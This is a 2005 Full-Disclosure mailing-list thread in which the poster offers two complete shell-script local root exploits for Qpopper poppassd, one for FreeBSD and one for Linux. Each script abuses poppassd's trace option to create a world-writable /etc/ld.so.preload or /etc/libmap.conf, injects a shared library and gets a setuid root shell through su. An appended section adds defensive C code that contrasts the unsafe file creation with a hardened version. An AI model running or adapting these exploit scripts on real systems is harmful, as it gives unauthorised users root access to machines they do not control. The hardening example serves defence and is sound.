Date: Sun Sep 25 18:06:27 2005
From: kingcope at gmx.net (kcope)
Subject: It's time for some warez - Qpopper poppassd local r00t exploit

lol, yeah you're missing something :-)
just give a try on some real box...

best regards,
kcope


Harry Hoffman wrote:

> Umm, am I missing something here? It looks like you need to be root to 
> run this "program"?
>
> In the fbsd one you are trying to write to /etc which has perms:
> drwxr-xr-x  17 root  wheel  2560 Sep  9 13:49 etc
>
> and in the linux one you do a set{gid,uid} to 0.
>
> both of these actions will fail without having root priv already.
>
>
>
> kcope wrote:
>
>> hello this is kcope,
>> here is my Qpopper poppassd local r00t exploit (latest version, 0day) 
>> both for linux and freebsd systems... have fun 8-)#
>>
>> ------------------------------------------------------------------------
>>
>> #!/bin/sh
>> ###########################################################################
>> # FreeBSD Qpopper poppassd latest version local r00t exploit by kcope   ###
>> # tested on FreeBSD 5.4-RELEASE                                         ###
>> ###########################################################################
>>
>> POPPASSD_PATH=/usr/local/bin/poppassd
>> HOOKLIB=libutil.so.4
>>
>> echo ""
>> echo "FreeBSD Qpopper poppassd latest version local r00t exploit by kcope"
>> echo ""
>> sleep 2
>> # umask 0000: any file poppassd creates for us comes out world-writable
>> umask 0000
>> if [ -f /etc/libmap.conf ]; then
>> echo "OOPS /etc/libmap.conf already exists.. exploit failed!"
>> exit
>> fi
>> cat > program.c << _EOF
>> #include <unistd.h>
>> #include <stdio.h>
>> #include <sys/types.h>
>> #include <stdlib.h>
>>
>> void _init()
>> {
>>  if (!geteuid()) {
>>  remove("/etc/libmap.conf");
>>  execl("/bin/sh","sh","-c","/bin/cp /bin/sh /tmp/xxxx ; /bin/chmod +xs /tmp/xxxx",NULL);
>>  }
>> }
>>
>> _EOF
>> gcc -o program.o -c program.c -fPIC
>> gcc -shared -Wl,-soname,libno_ex.so.1 -o libno_ex.so.1.0 program.o -nostartfiles
>> cp libno_ex.so.1.0 /tmp/libno_ex.so.1.0
>> echo "--- Now type ENTER ---"
>> echo ""
>> # poppassd is setuid root: -t makes it create its trace file at this path,
>> # root-owned and world-writable because of the umask above
>> $POPPASSD_PATH -t /etc/libmap.conf
>> # map libutil.so.4 to our library for every dynamically linked program
>> echo $HOOKLIB ../../../../../../tmp/libno_ex.so.1.0 > /etc/libmap.conf
>> # setuid su loads libutil.so.4, so our _init runs as root before su's main
>> su
>> if [ -f /tmp/xxxx ]; then
>> echo "IT'S A ROOTSHELL!!!"
>> /tmp/xxxx
>> else
>> echo "Sorry, exploit failed."
>> fi
>>  
>>
>> ------------------------------------------------------------------------
>>
>> #!/bin/sh
>> ###########################################################################
>> # Linux Qpopper poppassd latest version local r00t exploit by kcope     ###
>> # August 2005                                                           ###
>> # Confidential - Keep Private!                                          ###
>> ###########################################################################
>>
>>
>> POPPASSD_PATH=/usr/local/bin/poppassd
>>
>> echo ""
>> echo "Linux Qpopper poppassd latest version local r00t exploit by kcope"
>> echo ""
>> sleep 2
>> # umask 0000: any file poppassd creates for us comes out world-writable
>> umask 0000
>> if [ -f /etc/ld.so.preload ]; then
>> echo "OOPS /etc/ld.so.preload already exists.. exploit failed!"
>> exit
>> fi
>> cat > program.c << _EOF
>> #include <unistd.h>
>> #include <stdio.h>
>> #include <sys/types.h>
>> #include <stdlib.h>
>>
>> void _init()
>> {
>>  if (!geteuid()) {
>>  setgid(0);
>>  setuid(0);
>>  remove("/etc/ld.so.preload");
>>  execl("/bin/sh","sh","-c","chown root:root /tmp/suid; chmod +s /tmp/suid",NULL);
>>  }
>> }
>>
>> _EOF
>> gcc -o program.o -c program.c -fPIC
>> gcc -shared -Wl,-soname,libno_ex.so.1 -o libno_ex.so.1.0 program.o -nostartfiles
>> # helper that becomes the setuid-root shell once _init has chowned/chmod'ed it
>> cat > suid.c << _EOF
>> #include <unistd.h>
>> int main(void) {
>>        setgid(0); setuid(0);
>>        unlink("/tmp/suid");
>>        execl("/bin/sh","sh",(char *)0); }
>> _EOF
>>
>> gcc -o /tmp/suid suid.c
>> cp libno_ex.so.1.0 /tmp/libno_ex.so.1.0
>> echo "--- Now type ENTER ---"
>> echo ""
>> # poppassd is setuid root: -t makes it create its trace file at this path,
>> # root-owned and world-writable because of the umask above
>> $POPPASSD_PATH -t /etc/ld.so.preload
>> # ld.so now preloads our library into every dynamically linked program
>> echo /tmp/libno_ex.so.1.0 > /etc/ld.so.preload
>> # setuid su picks it up, so our _init runs as root before su's main
>> su
>> if [ -f /tmp/suid ]; then
>> echo "IT'S A ROOTSHELL!!!"
>> /tmp/suid
>> else
>> echo "Sorry, exploit failed."
>> fi
>>  
>>
>> ------------------------------------------------------------------------
>>
>> _______________________________________________
>> Full-Disclosure - We believe in it.
>> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>> Hosted and sponsored by Secunia - http://secunia.com/
>>
>
>
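
The file-creation pattern the two scripts rely on, next to a hardened version, as an added example that is neither from the post nor Qpopper's own code. What is inferred from the scripts: poppassd is installed setuid root, and "umask 0000; poppassd -t PATH" makes it create PATH while still root with the caller's umask applied, so /etc/ld.so.preload or /etc/libmap.conf ends up root-owned and world-writable. The function names, the temporary directory and the expected modes below are this example's own assumptions.

```c
#define _GNU_SOURCE
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <unistd.h>

/* Pattern inferred from the exploit (do not use): a setuid-root program
 * creates a caller-named file while still root and lets the caller's
 * umask decide the mode. With umask 0000 the file is 0666. */
int open_trace_unsafe(const char *path)
{
    return open(path, O_WRONLY | O_CREAT | O_APPEND, 0666);
}

/* Hardened version (assumed design, not Qpopper's): open as the real user,
 * never follow a symlink or reuse an existing file, and force mode 0600
 * whatever umask the caller set. Returns an fd or -1. */
int open_trace_safe(const char *path)
{
    uid_t ruid = getuid(), euid = geteuid();
    gid_t rgid = getgid(), egid = getegid();

    /* Drop to the invoking user for the open: gid first, then uid. */
    if (setegid(rgid) != 0 || seteuid(ruid) != 0)
        return -1;
    mode_t saved_umask = umask(077);          /* neutralise attacker's umask */
    int fd = open(path, O_WRONLY | O_CREAT | O_EXCL | O_NOFOLLOW | O_CLOEXEC,
                  0600);
    umask(saved_umask);
    /* Regain privilege (uid first, then gid); a real daemon could stay dropped. */
    if (seteuid(euid) != 0 || setegid(egid) != 0) {
        if (fd >= 0) close(fd);
        return -1;
    }
    if (fd < 0)
        return -1;

    /* Verify what we actually got: a regular file, ours, nothing for others. */
    struct stat st;
    if (fstat(fd, &st) != 0 || !S_ISREG(st.st_mode) || st.st_uid != ruid ||
        (st.st_mode & 077) != 0) {
        close(fd);
        return -1;
    }
    return fd;
}

/* Permission bits of a path, or -1 if it does not exist. */
int mode_bits(const char *path)
{
    struct stat st;
    if (stat(path, &st) != 0)
        return -1;
    return (int)(st.st_mode & 07777);
}

/* Run both variants under the attacker's umask 0000 inside a fresh temp
 * directory (constructed input). Reports the resulting modes and whether
 * the safe variant refuses to reopen an existing file. Returns 1 if both
 * opens succeeded, 0 otherwise. */
int demo_umask_abuse(int *unsafe_mode, int *safe_mode, int *refused_existing)
{
    char dir[] = "/tmp/poppassd_demo.XXXXXX";
    if (mkdtemp(dir) == NULL)
        return 0;
    char unsafe_path[256], safe_path[256];
    snprintf(unsafe_path, sizeof unsafe_path, "%s/unsafe", dir);
    snprintf(safe_path, sizeof safe_path, "%s/safe", dir);

    mode_t old = umask(0000);                 /* exactly what the exploit does */
    int fd1 = open_trace_unsafe(unsafe_path);
    int fd2 = open_trace_safe(safe_path);
    umask(old);

    *unsafe_mode = mode_bits(unsafe_path);    /* 0666: world-writable */
    *safe_mode = mode_bits(safe_path);        /* 0600 despite umask 0 */
    *refused_existing = (open_trace_safe(safe_path) < 0);  /* O_EXCL */

    if (fd1 >= 0) close(fd1);
    if (fd2 >= 0) close(fd2);
    unlink(unsafe_path);
    unlink(safe_path);
    rmdir(dir);
    return fd1 >= 0 && fd2 >= 0;
}

int main(void)
{
    int u = -1, s = -1, r = 0;
    int ok = demo_umask_abuse(&u, &s, &r);
    printf("opens ok=%d unsafe=%04o safe=%04o refused_existing=%d\n", ok, u, s, r);
    return ok ? 0 : 1;
}
```

Run as an ordinary user the unsafe open already shows the 0666 file; run setuid root it would show the root-owned one that ld.so and libmap trust. The privilege drop alone is not sufficient (a user can still name any file they may write), which is why the hardened version also refuses symlinks and existing files and checks the opened descriptor rather than the path.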
